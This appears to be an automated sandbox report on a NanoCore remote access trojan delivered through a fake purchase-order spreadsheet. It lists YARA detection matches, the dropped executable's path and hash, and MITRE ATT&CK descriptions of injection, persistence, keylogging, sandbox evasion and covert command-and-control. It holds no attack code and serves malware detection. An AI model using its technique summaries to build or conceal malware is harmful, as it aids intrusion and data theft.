Source: 00000005.00000002.2360021301.0000000005620000.00000004.00000001.sdmp, Author: Joe Security Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2360175265.00000000057E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2360175265.00000000057E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2359928883.00000000055D0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2359928883.00000000055D0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2359948690.00000000055E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2359948690.00000000055E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000001.2155256046.0000000000414000.00000040.00020000.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000001.2155256046.0000000000414000.00000040.00020000.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000005.00000001.2155256046.0000000000414000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2359904698.00000000055C0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2359904698.00000000055C0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2355089407.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000002.2355089407.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000005.00000002.2355089407.0000000000400000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000002.2356006744.0000000002201000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000005.00000002.2356006744.0000000002201000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2357138327.0000000004430000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2357138327.0000000004430000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000002.2357138327.0000000004430000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000005.00000002.2357138327.0000000004430000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2358435982.00000000049D0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2358435982.00000000049D0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2360005099.0000000005610000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2360005099.0000000005610000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2360120668.00000000057B0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2360120668.00000000057B0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2358503279.0000000004C60000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2358503279.0000000004C60000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000002.2356794986.00000000033AC000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000005.00000002.2356794986.00000000033AC000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Analysis Process: opjlpsercy.exe PID: 2248 Parent PID: 1388

General

Start time:	15:02:22
Start date:	10/06/2021
Path:	C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe'
Imagebase:	0x400000
File size:	682684 bytes
MD5 hash:	3DEB8B7E51C21CBA0C2C723C5AF953DD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000002.2194726397.0000000001C80000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000002.2194726397.0000000001C80000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000006.00000002.2194726397.0000000001C80000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 35%, ReversingLabs
Reputation:	low

Analysis Process: opjlpsercy.exe PID: 2236 Parent PID: 2248

General

Start time:	15:02:28
Start date:	10/06/2021
Path:	C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe'
Imagebase:	0x400000
File size:	682684 bytes
MD5 hash:	3DEB8B7E51C21CBA0C2C723C5AF953DD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000001.2192160089.0000000000414000.00000040.00020000.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000001.2192160089.0000000000414000.00000040.00020000.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000007.00000001.2192160089.0000000000414000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: NanoCore, Description: unknown, Source: 00000007.00000002.2207095611.000000000217E000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.2206463442.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.2206463442.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000007.00000002.2206463442.0000000000400000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.2207202360.0000000003171000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.2207202360.0000000003171000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000007.00000002.2207202360.0000000003171000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.2208042866.0000000004432000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.2208042866.0000000004432000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000007.00000002.2208042866.0000000004432000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.2207350789.00000000031FC000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000007.00000002.2207350789.00000000031FC000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.2207760336.0000000004310000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.2207760336.0000000004310000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000007.00000002.2207760336.0000000004310000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.2207916460.00000000043A0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000007.00000002.2207916460.00000000043A0000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.2207916460.00000000043A0000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000007.00000002.2207916460.00000000043A0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Analysis Process: opjlpsercy.exe PID: 2160 Parent PID: 1388

General

Start time:	15:02:30
Start date:	10/06/2021
Path:	C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe'
Imagebase:	0x400000
File size:	682684 bytes
MD5 hash:	3DEB8B7E51C21CBA0C2C723C5AF953DD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Purchase Order Price List 061021.xlsx

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: NanoCore

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

AV Detection:

Exploits:

E-Banking Fraud:

System Summary:

Stealing of Sensitive Information:

Remote Access Functionality:

Signature Overview

AV Detection:

Exploits:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "Purchase Order Price List 061021.xlsx"

Indicators

Streams

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre